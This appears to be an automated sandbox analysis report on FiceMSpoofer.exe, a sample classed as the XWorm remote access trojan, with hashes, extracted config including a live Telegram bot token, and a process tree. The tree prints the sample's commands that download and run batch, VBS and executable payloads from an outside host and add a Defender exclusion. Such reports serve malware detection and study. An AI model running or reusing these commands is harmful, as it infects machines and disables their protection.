Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2024 23:51

General

  • Target

    FiceMSpoofer.exe

  • Size

    79KB

  • MD5

    a0271b9ae627548e444ec28e80c49068

  • SHA1

    3dd83dd24753dcfa19bfbd74878fd62b41ab0b50

  • SHA256

    013b8d2a4d0c1e40fcaba90806beaf0e88504e74e9ff92ef6421b42d592bd3f0

  • SHA512

    a4746d45f4daf8bb2ba33701e695271f05e6ec5104a2b80d7f27eeb476f76b3ebd4cd40c29e0c50ad0935eb18ffc99e2f4db0b63fe65456d25f5d413a18df6a3

  • SSDEEP

    1536:+rae78zjORCDGwfdCSog01313Ks5gE2k:GahKyd2n31T5r2k

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/mDSLGN9q

  • telegram

    https://api.telegram.org/bot7168105056:AAGVK3B7ZFupxq4PpmnBpxAQOwJ5CUp76ow/sendMessage?chat_id=1992635040

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FiceMSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\FiceMSpoofer.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c main.bat
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\system32\curl.exe
        curl "https://download.t3k.site/d/TKZb9w6VkHTZyX68SiFGSXTD4mJnGe2pfci7dxQOrMkT6Ys58THoTTOTEwSQ" -o installer.bat
        3⤵
          PID:264
        • C:\Windows\system32\curl.exe
          curl "https://download.t3k.site/d/VM5Pb1HkPC4lGvDGlSx6uv8qU8NTIBUCeSGvPdsb7fvePGrDEjfhfc4dTCXl" -o run.vbs
          3⤵
            PID:532
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\run.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c installer.bat
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1076
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Powershell -Command "Set-MpPreference -ExclusionExtension exe"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3168
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Powershell -Command "Invoke-Webrequest 'https://download.t3k.site/d/vRjJCJlmX67rqifdZJH928gmqpPY0zcSgTwsV6NkTNTMtGKkm1SsVymBQVDz' -OutFile 'svchost.exe'"
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1656
              • C:\Users\Admin\AppData\Roaming\svchost.exe
                .\svchost.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3384
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c exit
              4⤵
                PID:2340

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat

          Filesize

          256B

          MD5

          e262e5bd963c829357048858a2d64e04

          SHA1

          2884d6841512bc948a7daee268da91240faa3c13

          SHA256

          14fe35548160972a32833d45cd302460b39876ea26b7646f6b424c8654ce1b55

          SHA512

          694d507b078ddab1ad5cdb653f33507f716557609dff9a78e1091b7efde9093f5155d2bcd7e921a0ce581d6f3bd8fdd68b996452b956e7ceaa1d5c7dec5ce2de

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ehbv2d5q.h2q.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\installer.bat

          Filesize

          257B

          MD5

          ae00757e6487b0c2ac116e09d5fd59c5

          SHA1

          3b4e7403b8934e8f31b68fbdff63fa063a91bd56

          SHA256

          57a777cf4a032ddc12d85b93fcbed6960608bb42e612b8ab224fbf5aff8f4f8e

          SHA512

          9431e99b9179fb2e33a5c227e9fc603e9c61b1db9f247b08c6b9874bb80b6510ff215c04e04ea9a77150307eb27c8dcc0dab4ce5f0757a13cdb5adbce9d98e15

        • C:\Users\Admin\AppData\Roaming\run.vbs

          Filesize

          134B

          MD5

          6d346aad37debed59b302c74a50d5ff7

          SHA1

          356bd92ec121ec0a3f4b1c12ef81ada47ebf6429

          SHA256

          b4033fe422e7f1a0351bac53c119321b6c90b6877e65fef4de17bbbba2a767f2

          SHA512

          58865078ebf065fa969bed3b26172101f67193aaf6e9e018aa87d46ec535f982739a7b4526ad78c72788f71dd6d63094add2837a3c610d8ca345da8eab254112

        • C:\Users\Admin\AppData\Roaming\svchost.exe

          Filesize

          83KB

          MD5

          cf73759724ceaffa0353900bd428a555

          SHA1

          a62a68b7a2c0db839f05a763a9c5bda7b92f4709

          SHA256

          39d928ef59af8f60ad6ff7dc973cc3d00e3f6751d5fd3824c615c311b0a14da0

          SHA512

          d6340601e1a3ebda121390d55a3f2fbb6a1fd38e8fb51115823377f72087ef17409eafe41c182736c20b70ce25fabc1f83750112804b981c34d791c69e403e11

        • memory/3168-8-0x000001E1DD2C0000-0x000001E1DD2E2000-memory.dmp

          Filesize

          136KB

        • memory/3384-36-0x0000000000D70000-0x0000000000D8C000-memory.dmp

          Filesize

          112KB